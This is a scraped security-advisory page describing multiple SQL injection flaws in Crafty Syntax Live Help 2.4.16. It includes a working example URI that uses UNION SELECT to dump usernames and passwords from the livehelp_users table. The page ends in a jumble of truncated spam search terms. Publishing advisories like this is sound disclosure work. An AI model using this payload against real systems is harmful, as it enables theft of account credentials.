about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities


Title Crafty Syntax Live Help Multiple SQL Injection Vulnerabilities
Published 2008-08-25-12:00AM
Updated 2008-08-29-01:24AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  James Bercegay of the GulfTech Security Research Team
Vulnerable  Crafty Syntax Live Help Crafty Syntax Live Help 2.4.16
Not Vulnerable  Crafty Syntax Live Help Crafty Syntax Live Help 2.15
Code  Attackers can use a browser to exploit these issues.The following example URI is available:http://www.example.com/is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat(username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 02 Dec 2009 17:41:49 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.anima sex anara patches in roni www.anima Video Sax Cerita Ser searchgall sysmantec www.cfjksh lo655l linuxoot mxbb+newsr mxbb+newsr netop scho videos de S/portal/f trisha sex Sanjoajcol WWW XNXXCO SD01993688 Www.seks.k www.google Hardsexx sexy south www.google teamspeak www.gmhx.n netop scho Www.freega Descarga g search/exp FELIM SEXY www.china- www.dhyaq. FELIM SEXY drive-zigg php advanc password k xxxmovie.c mxbb+newsr Hunmer ima www.tamil Crack+Data www.taobao sonsexmoth www.gggxxx indai sex blo how to use